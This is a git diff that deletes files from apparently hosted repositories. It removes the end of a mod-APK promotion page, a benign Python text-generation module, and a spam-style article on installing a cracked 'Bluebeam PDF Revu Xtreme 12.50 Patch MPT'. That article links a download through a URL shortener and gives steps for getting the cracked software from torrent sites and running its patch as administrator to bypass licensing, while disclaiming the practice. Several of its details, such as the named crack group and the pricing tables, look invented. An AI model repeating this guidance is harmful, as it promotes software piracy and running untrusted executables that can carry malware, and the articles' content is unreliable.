      If you want to try other knife throwing games on Google Play, here are some of them:

      -
        -
      • Flippy Knife: A game that lets you flip knives, axes, swords, and other weapons in different modes and environments.(https://play.google.com/store/apps/details?id=com.BeresnevGames.Knife&hl=en_US&gl=US)
      • -
      • Knife Bounty: A game that challenges you to throw knives at fruits, coins, balloons, and other targets while avoiding bombs and obstacles.(https://play.google.com/store/apps/details?id=com.knife.bounty&hl=en_US&gl=US)
      • -
      • Knife Dash: A game that tests your reflexes and accuracy by throwing knives at spinning boards with different patterns and shapes.(https://play.google.com/store/apps/details?id=com.knife.dash.hit&hl=en_US&gl=US)
      • -
      -

      Other mod apk websites that offer Knife Hit

      -

      If you want to try other mod apk websites that offer Knife Hit, here are some of them:

      -
        -
      • Happymod: A website that provides thousands of mod apk files for various games and apps, including Knife Hit.(https://www.happymod.com/knife-hit-mod/com.ketchapp.knifehit/)
      • -
      • Moddroid: A website that offers high-quality mod apk files for popular games and apps, including Knife Hit.(https://moddroid.com/knife-hit.html)
      • -
      • Aptoide: A website that allows users to download and share mod apk files for various games and apps, including Knife Hit.(https://knife-hit.en.aptoide.com/app)
      • -
      -

      Conclusion

      -

      In conclusion, Knife Hit is a fun and addictive game of knife throwing that you can download from Google Play or from mod apk websites. With mod apk versions, you can enjoy hack features that make the game easier and more enjoyable. However, you should also be aware of the risks of using mod apk files, such as malware, ban, data loss, or boredom. If you want to try other knife throwing games or other mod apk websites, you can check out the alternatives we suggested. We hope this article helped you learn more about Knife Hit and how to download its mod apk version. Have fun playing the game and throwing knives!

      FAQs

      -

      Here are some frequently asked questions about Knife Hit and its mod apk version:

      -

      Q: Is Knife Hit free to play?

      -

      A: Yes, Knife Hit is free to play on Google Play. However, it contains in-app purchases and ads that may affect your gaming experience.

      -

      Q: Is Mod APK Knife Hit safe to use?

      -

      A: Mod APK Knife Hit is not officially endorsed by the game developer or Google Play. Therefore, it may contain malware or viruses that can harm your device or personal information. You should only download mod apk files from trusted sources and scan them with antivirus software before installing them.

      -

      Q: Can I play Mod APK Knife Hit online with other players?

      -

      A: No, Mod APK Knife Hit is not compatible with online multiplayer mode. You can only play it offline on your device.

      -

      Q: How can I update Mod APK Knife Hit to the latest version?

      -

      A: You cannot update Mod APK Knife Hit from Google Play or the game itself. You need to download the latest mod apk file from the website where you got it and install it over the old one.

      -

      Q: What are some tips and tricks for playing Knife Hit?

      -

      A: Some tips and tricks for playing Knife Hit are:

      -
        -
      • Watch the target carefully and observe its rotation speed and direction.
      • -
      • Tap on the screen when there is a gap between the knives or obstacles on the target.
      • -
      • Collect as many coins and apples as possible to buy new knives or unlock new levels.
      • -
      • Use different knives for different situations. Some knives have special effects, such as splitting, bouncing, or exploding.
      • -
      • Don't rush or panic. Take your time and aim carefully.
      • -

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/tinkoff-ai/caif/generator.py b/spaces/tinkoff-ai/caif/generator.py deleted file mode 100644 index 377fa0f93956cbb9e628f38639f6a68689a34e3e..0000000000000000000000000000000000000000 --- a/spaces/tinkoff-ai/caif/generator.py +++ /dev/null @@ -1,266 +0,0 @@ -from typing import Optional, Union - -import torch -import transformers -import streamlit as st - -from plotly import graph_objects as go - -from utils import get_lm - - -class Generator: - def __init__(self, lm_model_name, device, entropy=None): - - self.device = device - - self.tokenizer = transformers.AutoTokenizer.from_pretrained( - lm_model_name - ) - self.lm = get_lm(lm_model_name).to(device) - self.lm.eval() - - self.lm.config.pad_token_id = self.lm.config.eos_token_id - self.tokenizer.add_special_tokens( - {"pad_token": self.tokenizer.decode(self.lm.config.eos_token_id)} - ) - self.caif_sampler = None - self.ordinary_sampler = None - self.entropy_based_stats = { - "skips": 0, - "avg_entropy": 0, - "count": 0, - } - self.entropy = entropy - - def set_caif_sampler(self, sampler): - self.caif_sampler = sampler - - def set_ordinary_sampler(self, sampler): - self.ordinary_sampler = sampler - - def sample_sequences( - self, - num_samples: int, - input_prompt: Optional[str], - max_length: int, - caif_period: int, - caif_tokens_num: Union[int, None] = None, - entropy: float = None, - progress_bar=None, - **sampler_kwargs - ): - self.entropy = entropy - - input_ids, past, ended_sequences = self.get_input_ids( - input_prompt, - num_samples, - ) - text = st.empty() - plot = st.empty() - gen_history = [] - layout = go.Layout({ - "xaxis": { - "title": "# Tokens" - }, - "yaxis": { - "title": "Desired Attribute" - }, - "plot_bgcolor": '#FFFFFF', - "template": "plotly_white", - "hovermode": "x", - - }) - inp_len = len(input_ids[0]) - if self.caif_sampler is not None: - current_decoded = self.tokenizer.decode(input_ids[0]) - probs = torch.exp( - self.caif_sampler.get_classifier_log_probs( - current_decoded, target_cls_id=sampler_kwargs["target_cls_id"] - ) - ).item() - gen_history += [probs] - for i in range(max_length): - is_caif_step = ( - i % caif_period == 0 and self.caif_sampler is not None - ) - input_ids, past, ended_sequences = self.generation_step( - input_ids, - past, - ended_sequences, - is_caif_step, - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - progress_bar.progress((i+1)/max_length) - if ended_sequences.all(): - break - current_decoded = self.tokenizer.decode(input_ids[0]) - if self.caif_sampler is not None: - probs = torch.exp( - self.caif_sampler.get_classifier_log_probs( - current_decoded, target_cls_id=sampler_kwargs["target_cls_id"] - ) - ).item() - gen_history += [probs] - scatter_data = go.Scatter({ - "x": list(range(len(gen_history))), - "y": gen_history, - "hovertext": ["[PROMPT]"] + [self.tokenizer.decode(t) for t in input_ids[0][inp_len:]] - }) - fig = go.Figure([scatter_data], layout=layout) - plot.plotly_chart(fig, use_container_width=True) - if i == 0: - with st.expander("What is it?"): - st.write("You can see how the probability of the desired attribute varies for every generation step.") - text.text(current_decoded) - - return ( - [ - self.tokenizer.decode(sequence, skip_special_tokens=True) - for sequence in input_ids - ], - input_ids, - ) - - def generation_step( - self, - input_ids, - past, - ended_sequences, - is_caif_step: bool, - caif_tokens_num=None, - **sampler_kwargs - ): - prepared_inputs = self.lm.prepare_inputs_for_generation( - input_ids, 
past, use_cache=True - ) - outputs = self.lm( - **prepared_inputs, - output_attentions=False, - output_hidden_states=False, - return_dict=True - ) - - past = outputs.past_key_values - if self.entropy is not None: - normalized = torch.nn.functional.log_softmax( - outputs.logits, dim=-1 - ) - p = torch.exp(normalized) - output_probs = p - output_information = -normalized - output_entropy = (output_probs * output_information).sum(-1)[:, -1] - batch_size = output_entropy.shape[0] - caif_mask = torch.ge(output_entropy, self.entropy) - ordinary_mask = ~caif_mask - self.entropy_based_stats["skips"] += caif_mask.sum() / batch_size - self.entropy_based_stats["count"] += 1 - self.entropy_based_stats["avg_entropy"] += ( - output_entropy.sum() / batch_size - ) - flatten_entropy = output_entropy.view(-1).cpu().tolist() - if "entropy" not in self.entropy_based_stats.keys(): - self.entropy_based_stats["entropy"] = flatten_entropy - else: - self.entropy_based_stats["entropy"] += flatten_entropy - - if caif_mask.sum() == 0: - next_tokens_sampler = self.ordinary_sampler - next_tokens = next_tokens_sampler( - input_ids, - outputs.logits, - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - next_tokens = ( - next_tokens * (1 - ended_sequences.long()) - + self.lm.config.eos_token_id * ended_sequences.long() - ).long() - - elif caif_mask.sum() == batch_size: - next_tokens_sampler = self.caif_sampler - next_tokens = next_tokens_sampler( - input_ids, - outputs.logits, - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - next_tokens = ( - next_tokens * (1 - ended_sequences.long()) - + self.lm.config.eos_token_id * ended_sequences.long() - ).long() - - else: - next_tokens_caif = self.caif_sampler( - input_ids[caif_mask], - outputs.logits[caif_mask], - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - next_tokens_ordinary = self.ordinary_sampler( - input_ids[ordinary_mask], - outputs.logits[ordinary_mask], - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - next_tokens_caif = ( - next_tokens_caif * (1 - ended_sequences[caif_mask].long()) - + self.lm.config.eos_token_id - * ended_sequences[caif_mask].long() - ).long() - next_tokens_ordinary = ( - next_tokens_ordinary - * (1 - ended_sequences[ordinary_mask].long()) - + self.lm.config.eos_token_id - * ended_sequences[ordinary_mask].long() - ).long() - - next_tokens = torch.ones(batch_size).long().to(self.device) - next_tokens[caif_mask] = next_tokens_caif - next_tokens[ordinary_mask] = next_tokens_ordinary - else: - if is_caif_step: - next_tokens_sampler = self.caif_sampler - else: - next_tokens_sampler = self.ordinary_sampler - - next_tokens = next_tokens_sampler( - input_ids, - outputs.logits, - caif_tokens_num=caif_tokens_num, - **sampler_kwargs - ) - - next_tokens = ( - next_tokens * (1 - ended_sequences.long()) - + self.lm.config.eos_token_id * ended_sequences.long() - ).long() - - input_ids = torch.cat( - [input_ids, next_tokens[:, None].to(self.device)], dim=-1 - ) - - ended_sequences += next_tokens == self.lm.config.eos_token_id - - return input_ids, past, ended_sequences - - def get_input_ids(self, input_prompt, num_samples): - #input_ids = torch.tensor([[self.lm.config.bos_token_id]]) - if input_prompt is not None: - input_prompt = self.tokenizer( - input_prompt, return_tensors="pt" - ).input_ids - input_ids = input_prompt - input_ids = input_ids.repeat(num_samples, 1).to(self.device) - past = None - ended_sequences = torch.zeros( - input_ids.shape[0], device=self.device - ).bool() - - return input_ids, past, ended_sequences - - 
@staticmethod - def sample(unscaled_probs, values): - samples = torch.multinomial(unscaled_probs, 1) - return torch.take_along_dim(values, samples, dim=1) diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/((INSTALL)) BluebeamPDFRevueXtreme1250PatchMPT64bit.md b/spaces/tioseFevbu/cartoon-converter/scripts/((INSTALL)) BluebeamPDFRevueXtreme1250PatchMPT64bit.md deleted file mode 100644 index 9a26d2dd29fd8e05f0833c604a9fe8d1ee937b66..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/((INSTALL)) BluebeamPDFRevueXtreme1250PatchMPT64bit.md +++ /dev/null @@ -1,279 +0,0 @@ -
      -

      How to Install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -

      If you are looking for a powerful and versatile software to create, edit, and collaborate on PDF files, you might want to try Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit. This is a patched version of the original software that allows you to use all the features and functions without any limitations or restrictions.

      -

      ((INSTALL)) BluebeamPDFRevueXtreme1250PatchMPT64bit


      Download Filehttps://urlcod.com/2uHySD



      -

      In this article, we will show you what Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is, how to download it, how to install it, how to use it, and how to troubleshoot common issues with it.

      -

      What is Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      Bluebeam PDF Revu Xtreme is a software that lets you create, edit, annotate, and share PDF files with ease and efficiency. It is designed for professionals in various fields, such as architecture, engineering, construction, design, and more.

      -

      Bluebeam PDF Revu Xtreme has many features and benefits that make it stand out from other PDF software, such as:

      -

      Features and benefits of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • It allows you to create high-quality PDF files from any source, such as Microsoft Office documents, CAD drawings, images, scans, and more.
      • -
      • It lets you edit and modify PDF files with tools such as text editing, cropping, resizing, rotating, merging, splitting, watermarking, redacting, and more.
      • -
      • It enables you to annotate and mark up PDF files with tools such as stamps, highlights, comments, shapes, measurements, hyperlinks, bookmarks, and more.
      • -
      • It supports various file formats for importing and exporting data, such as DWG, DWF, DXF, TIFF, JPEG, PNG, BMP, GIF, DOCX, XLSX, PPTX, HTML, XML, CSV, and more.
      • -
        • It integrates with cloud services such as Dropbox, Box, OneDrive, SharePoint, Google Drive, and Bluebeam Studio.
        
      • -
      • It allows you to collaborate and share PDF files with other users in real time, with features such as chat, markup tracking, file locking, version control, and more.
      • -
      • It offers advanced features such as OCR (optical character recognition), forms creation and filling, digital signatures, batch processing, scripting, and more.
      • -
      -

      Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is a modified version of the original software that has been cracked by a group of hackers called MPT (Music Patch Team). This patch removes the license verification and activation process of the software, allowing you to use it for free and without any limitations or restrictions.

      -

      However, using a patched software is illegal and risky, as it may contain malware, viruses, or spyware that can harm your computer or compromise your data. Moreover, you will not be able to receive any updates or technical support from the official developers of the software. Therefore, we do not recommend or endorse using Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, and we advise you to purchase the original software from the official website if you want to use it legally and safely.

      -

      -

      Requirements and compatibility of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -

      Before you download and install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, you need to make sure that your computer meets the minimum system requirements and is compatible with the software. Here are the requirements and compatibility of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit:

      - - - - - - - - - - - - - - - - - - - - - - -
      Operating systemProcessorMemoryDisk spaceDisplay
      Windows 7 SP1/8/8.1/10 (64-bit only)Intel Core i3 or equivalent4 GB RAM (8 GB recommended)2 GB free disk space (4 GB recommended)1024 x 768 resolution (1920 x 1080 recommended)
      Mac OS X 10.10/10.11/10.12/10.13/10.14/10.15/11 (64-bit only)Intel Core i5 or equivalent4 GB RAM (8 GB recommended)2 GB free disk space (4 GB recommended)1024 x 768 resolution (1920 x 1080 recommended)
      -

      Note that Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is not compatible with Linux or other operating systems.

      -
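        If you want a quick sanity check of a machine against the minimum figures in the table above before installing anything, a short script along the following lines can report the result. This is only a rough sketch based on the numbers listed in this article: the psutil dependency and the 4 GB RAM, 2 GB disk, and 64-bit thresholds are assumptions taken from the table, not part of any Bluebeam installer.

        ```python
        # Rough pre-install check against the minimums listed in the table above.
        # Assumes psutil is available (pip install psutil); the thresholds come from
        # this article's table, not from an official Bluebeam requirements check.
        import platform
        import shutil

        import psutil


        def meets_minimums(min_ram_gb=4, min_disk_gb=2):
            is_64bit = platform.machine().endswith("64")        # e.g. AMD64, x86_64, arm64
            os_ok = platform.system() in ("Windows", "Darwin")  # the table lists Windows and Mac only
            ram_ok = psutil.virtual_memory().total >= min_ram_gb * 1024 ** 3
            disk_ok = shutil.disk_usage("/").free >= min_disk_gb * 1024 ** 3
            return is_64bit and os_ok and ram_ok and disk_ok


        if __name__ == "__main__":
            print("Meets the minimum requirements listed above:", meets_minimums())
        ```
        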

      How to download Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      If you want to download Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, you have two options: download it from the official website or download it from a torrent site.

      -

      Download from the official website

      -

        The official website of Bluebeam PDF Revu Xtreme is https://www.bluebeam.com/solutions/revu. Here you can find more information about the software, such as features, pricing, testimonials, support, and more.
        

      -

      To download Bluebeam PDF Revu Xtreme from the official website, you need to follow these steps:

      -
        -
        1. Go to https://www.bluebeam.com/solutions/revu.
        
      2. -
      3. Select the edition of Bluebeam PDF Revu Xtreme that suits your needs: Standard, CAD, or eXtreme.
      4. -
      5. Select the language of Bluebeam PDF Revu Xtreme that you prefer: English, German, Spanish, French, Swedish, Finnish, Norwegian, Danish, Dutch, Italian, Portuguese-Brazilian.
      6. -
      7. Select the version of Bluebeam PDF Revu Xtreme that matches your operating system: Windows or Mac.
      8. -
      9. Click on the "Download" button and save the file to your computer.
      10. -
      11. You will also receive an email with a link to download the software and a trial license key that will allow you to use the software for 30 days for free.
      12. -
      -

      Note that this is not the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, but the original version that requires activation and payment after the trial period expires.

      Download from a torrent site

      -

      Another option to download Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is to use a torrent site. A torrent site is a website that hosts and distributes files that are shared by users through a peer-to-peer network. Torrent sites are often used to share pirated or illegal content, such as movies, music, games, software, and more.

      -

      To download Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you need to follow these steps:

      -
        -
      1. Find a torrent site that has the file you are looking for. Some examples of popular torrent sites are The Pirate Bay, 1337x, RARBG, Torrentz2, and more.
      2. -
      3. Search for "Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit" on the torrent site and choose the file that has the most seeders and leechers. Seeders are users who have the complete file and are sharing it with others. Leechers are users who are downloading the file and are also sharing it with others.
      4. -
      5. Download the torrent file or magnet link of the file you have chosen. A torrent file is a small file that contains information about the file you want to download and the users who are sharing it. A magnet link is a URL that does the same thing as a torrent file but without requiring a separate file.
      6. -
      7. Open the torrent file or magnet link with a torrent client. A torrent client is a software that allows you to download and upload files through the torrent network. Some examples of popular torrent clients are uTorrent, BitTorrent, qBittorrent, Vuze, and more.
      8. -
      9. Wait for the download to finish and then open the downloaded folder. You should see the Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit installer and the patch file.
      10. -
      -

      Note that this is the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, but it is illegal and risky to use it, as it may contain malware, viruses, or spyware that can harm your computer or compromise your data. Moreover, you will not be able to receive any updates or technical support from the official developers of the software. Therefore, we do not recommend or endorse using Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, and we advise you to purchase the original software from the official website if you want to use it legally and safely.

      -

      How to install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      After you have downloaded Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from either the official website or a torrent site, you need to install it on your computer. The installation process may vary depending on your operating system: Windows or Mac.

      -

      Installation instructions for Windows

      -

      To install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on Windows, you need to follow these steps:

      -
        -
      1. Double-click on the Bluebeam PDF Revu Xtreme 12.50 installer file that you have downloaded.
      2. -
      3. Follow the instructions on the screen to select your language, accept the license agreement, choose your installation location, and customize your installation options.
      4. -
      5. Click on the "Install" button and wait for the installation to complete.
      6. -
      7. If you have downloaded the original version of Bluebeam PDF Revu Xtreme 12.50 from the official website, you will need to activate it with the trial license key that you have received by email or purchase a full license key from the official website.
      8. -
      9. If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will need to apply the patch file that you have downloaded.
      10. -
      11. To apply the patch file, right-click on it and select "Run as administrator".
      12. -
      13. A window will open with instructions on how to patch Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit.
      14. -
      15. Follow the instructions and click on the "Patch" button.
      16. -
      17. A message will appear confirming that Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit has been patched successfully.
      18. -
      19. Click on "OK" and close the window.
      20. -
      -

      You have now installed Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on your Windows computer.

      -

      Installation instructions for Mac

      To install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on Mac, you need to follow these steps:
        -
      1. Double-click on the Bluebeam PDF Revu Xtreme 12.50 installer file that you have downloaded.
      2. -
      3. Follow the instructions on the screen to drag and drop the Bluebeam PDF Revu Xtreme 12.50 icon to the Applications folder.
      4. -
      5. If you have downloaded the original version of Bluebeam PDF Revu Xtreme 12.50 from the official website, you will need to activate it with the trial license key that you have received by email or purchase a full license key from the official website.
      6. -
      7. If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will need to apply the patch file that you have downloaded.
      8. -
      9. To apply the patch file, right-click on it and select "Open".
      10. -
      11. A window will open with instructions on how to patch Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit.
      12. -
      13. Follow the instructions and click on the "Patch" button.
      14. -
      15. A message will appear confirming that Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit has been patched successfully.
      16. -
      17. Click on "OK" and close the window.
      18. -
      -

      You have now installed Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on your Mac computer.

      -

      How to use Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      After you have installed Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on your computer, you can start using it to create, edit, annotate, and share PDF files. Here are some tips on how to use Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit:

      -

      How to create, edit, and annotate PDF files with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • To create a new PDF file, click on the "File" menu and select "New". You can choose to create a blank PDF file or use a template or a scanner.
      • -
      • To open an existing PDF file, click on the "File" menu and select "Open". You can browse your computer or cloud storage for the PDF file you want to open.
      • -
      • To edit a PDF file, use the tools in the "Edit" menu or toolbar. You can change the text, images, fonts, colors, layout, and more of your PDF file.
      • -
      • To annotate a PDF file, use the tools in the "Markup" menu or toolbar. You can add stamps, highlights, comments, shapes, measurements, hyperlinks, bookmarks, and more to your PDF file.
      • -
      • To save your changes to a PDF file, click on the "File" menu and select "Save" or "Save As". You can choose to save your PDF file in the same location or a different location, and with the same name or a different name.
      • -
      -

      How to collaborate and share PDF files with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • To collaborate and share PDF files with other users in real time, use the "Studio" feature of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit. Studio is a cloud-based platform that allows you to create and join online sessions and projects where you can chat, markup, track, lock, version control, and share PDF files with other users.
      • -
      • To create a new Studio session or project, click on the "Studio" menu and select "New Session" or "New Project". You can name your session or project, invite participants, set permissions, upload files, and more.
      • -
      • To join an existing Studio session or project, click on the "Studio" menu and select "Join Session" or "Join Project". You can enter the session ID or project ID that you have received from the host or browse for available sessions or projects.
      • -
          • To share a PDF file via email or cloud service, click on the "File" menu and select "Share". You can choose to share your PDF file via email or a cloud service such as Dropbox, Box, OneDrive, SharePoint, Google Drive, and Bluebeam Studio. You can share your PDF file as an attachment or a link, and add a message and a subject to your email.
    
      • -
      -

      How to troubleshoot common issues with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      Sometimes, you may encounter some issues or problems with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, such as activation or deactivation errors, update or uninstall errors, performance or compatibility issues, and more. Here are some tips on how to troubleshoot common issues with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit:

      -

      How to activate or deactivate Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • If you have downloaded the original version of Bluebeam PDF Revu Xtreme 12.50 from the official website, you will need to activate it with a license key that you have purchased from the official website or received by email as a trial license key.
      • -
      • To activate Bluebeam PDF Revu Xtreme 12.50, click on the "Help" menu and select "Register". Enter your license key and click on "Register". A message will appear confirming that your software has been activated successfully.
      • -
      • To deactivate Bluebeam PDF Revu Xtreme 12.50, click on the "Help" menu and select "Unregister". A message will appear asking you to confirm your deactivation. Click on "Yes". A message will appear confirming that your software has been deactivated successfully.
      • -
      • If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will not need to activate or deactivate it, as the patch file has already bypassed the license verification and activation process of the software.
      • -
      -

      How to update or uninstall Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • If you have downloaded the original version of Bluebeam PDF Revu Xtreme 12.50 from the official website, you will be able to receive updates and patches from the official developers of the software.
      • -
      • To update Bluebeam PDF Revu Xtreme 12.50, click on the "Help" menu and select "Check for Updates". If there are any available updates, you will be prompted to download and install them.
      • -
      • To uninstall Bluebeam PDF Revu Xtreme 12.50, go to the Control Panel (Windows) or the Applications folder (Mac) and find the Bluebeam PDF Revu Xtreme 12.50 icon. Right-click on it and select "Uninstall" (Windows) or "Move to Trash" (Mac). Follow the instructions on the screen to complete the uninstallation process.
      • -
      • If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will not be able to receive any updates or patches from the official developers of the software, as they may detect that your software is illegal and block it.
      • -
      • To update or uninstall Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, you will need to follow the same steps as above, but you may encounter some errors or problems due to the patch file that has modified the original software.
      • -
      -

      Conclusion

      -

      In this article, we have shown you how to install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, a powerful and versatile software that lets you create, edit, annotate, and share PDF files with ease and efficiency.

      -

      We have also explained what Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is, how to download it, how to use it, and how to troubleshoot common issues with it.

      -

      However, we have also warned you that using a patched software is illegal and risky, as it may contain malware, viruses, or spyware that can harm your computer or compromise your data. Moreover, you will not be able to receive any updates or technical support from the official developers of the software.

      -

      Therefore, we do not recommend or endorse using Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, and we advise you to purchase the original software from the official website if you want to use it legally and safely.

      -

      FAQs

      -

      Here are some frequently asked questions about Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit:

      -

      What is the difference between Bluebeam PDF Revu Xtreme Standard, CAD, and eXtreme editions?

      -

      Bluebeam PDF Revu Xtreme has three editions: Standard, CAD, and eXtreme. The main difference between them is the level of features and functions that they offer. Here is a comparison table of the three editions:

    | Feature | Standard | CAD | eXtreme |
    | --- | --- | --- | --- |
    | Create PDF files from any source | Yes | Yes | Yes |
    | Edit and modify PDF files | Yes | Yes | Yes |
    | Annotate and mark up PDF files | Yes | Yes | Yes |
    | Support various file formats for importing and exporting data | Yes | Yes (including CAD formats) | Yes (including CAD formats) |
    | Integrate with cloud services | Yes | Yes | Yes |
    | Collaborate and share PDF files with other users in real time | Yes | Yes | Yes |
    | OCR (optical character recognition) | No | No | Yes |
    | Forms creation and filling | No | No | Yes |
    | Digital signatures | No | No | Yes |
    | Batch processing | No | No | Yes |
    | Scripting | No | No | Yes |
    
      -

      You can choose the edition of Bluebeam PDF Revu Xtreme that suits your needs and budget from the official website.

      -

      How much does Bluebeam PDF Revu Xtreme cost?

      -

      The original version of Bluebeam PDF Revu Xtreme is not free, but it offers a 30-day free trial for you to test its features and functions. After the trial period expires, you will need to purchase a license key to continue using the software.

      -

      The price of Bluebeam PDF Revu Xtreme depends on the edition and the number of licenses that you want to buy. Here is the pricing table of Bluebeam PDF Revu Xtreme from the official website:

    | Edition | Price per license (USD) | Price per license (EUR) | Price per license (GBP) | Price per license (AUD) | Price per license (CAD) | Price per license (SEK) |
    | --- | --- | --- | --- | --- | --- | --- |
    | Standard | $349 | €299 | £249 | $499 | $449 | 2,999 kr |
    | CAD | $449 | €399 | £349 | $649 | $599 | 3,999 kr |
    | eXtreme | $599 | €499 | £449 | $849 | $799 | 4,999 kr |
    
      -

      You can also get discounts if you buy multiple licenses or if you are a student, educator, or academic institution. You can check the details and terms and conditions of the discounts from the official website.

      -

      Is Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit safe to use?

      -

      No, Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is not safe to use, as it is a patched version of the original software that has been cracked by a group of hackers called MPT (Music Patch Team). This patch removes the license verification and activation process of the software, allowing you to use it for free and without any limitations or restrictions.

      -

      However, using a patched software is illegal and risky, as it may contain malware, viruses, or spyware that can harm your computer or compromise your data. Moreover, you will not be able to receive any updates or technical support from the official developers of the software.

      -

      Therefore, we do not recommend or endorse using Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, and we advise you to purchase the original software from the official website if you want to use it legally and safely.

      -

      How can I contact the support team of Bluebeam PDF Revu Xtreme?

      -

      If you have any questions, issues, or feedback about Bluebeam PDF Revu Xtreme, you can contact the support team of the software from the official website. Here are some ways to contact them:

      -
        -
      • By phone: You can call them at +1 (626) 788-4100 (US) or +45 89 88 31 88 (Europe).
      • -
      • By email: You can email them at support@bluebeam.com (US) or support@bluebeam.eu (Europe).
      • -
      • By chat: You can chat with them online from the official website.
      • -
      • By forum: You can join the Bluebeam Community Forum and post your questions or comments there.
      • -
      • By social media: You can follow them on Facebook, Twitter, LinkedIn, YouTube, and Instagram and send them messages there.
      • -
      -

      Note that these contact methods are only available for users who have purchased the original version of Bluebeam PDF Revu Xtreme from the official website. If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will not be able to contact the support team of the software, as they may detect that your software is illegal and block it.

      -

      What are some alternatives to Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      If you are looking for some alternatives to Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, here are some suggestions:

      -
        -
      • Adobe Acrobat Pro DC: This is a popular and professional software that lets you create, edit, annotate, and share PDF files with various features and functions. It also integrates with cloud services such as Adobe Document Cloud and Adobe Creative Cloud.
      • -
          • Nitro Pro: This is a powerful and user-friendly software that lets you create, edit, annotate, and share PDF files with various features and functions. It also integrates with cloud services such as Dropbox, Google Drive, OneDrive, SharePoint, and Nitro Cloud.
    
      • -
          • PDFelement: This is a simple and affordable software that lets you create, edit, annotate, and share PDF files with various features and functions. It also integrates with cloud services such as Dropbox, Google Drive, OneDrive, Box, Evernote, and more.
    
      • -
          • Foxit PhantomPDF: This is a fast and secure software that lets you create, edit, annotate, and share PDF files with various features and functions. It also integrates with cloud services such as Dropbox, Google Drive, OneDrive, Box, SharePoint, and Foxit Cloud.
    
      • -
      -

      You can compare and contrast these alternatives to Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit and choose the one that best suits your needs and preferences.

      b2dd77e56b
      -
      -
      \ No newline at end of file diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/Arma 2 Operation Arrowhead Patch Crack 1.52 Checked.md b/spaces/tioseFevbu/cartoon-converter/scripts/Arma 2 Operation Arrowhead Patch Crack 1.52 Checked.md deleted file mode 100644 index 8113d3c1618cb79525ef3bf184e321e8346ed708..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/Arma 2 Operation Arrowhead Patch Crack 1.52 Checked.md +++ /dev/null @@ -1,93 +0,0 @@ -
      -

      Arma 2 Operation Arrowhead Patch Crack 1.52 | Checked

      -

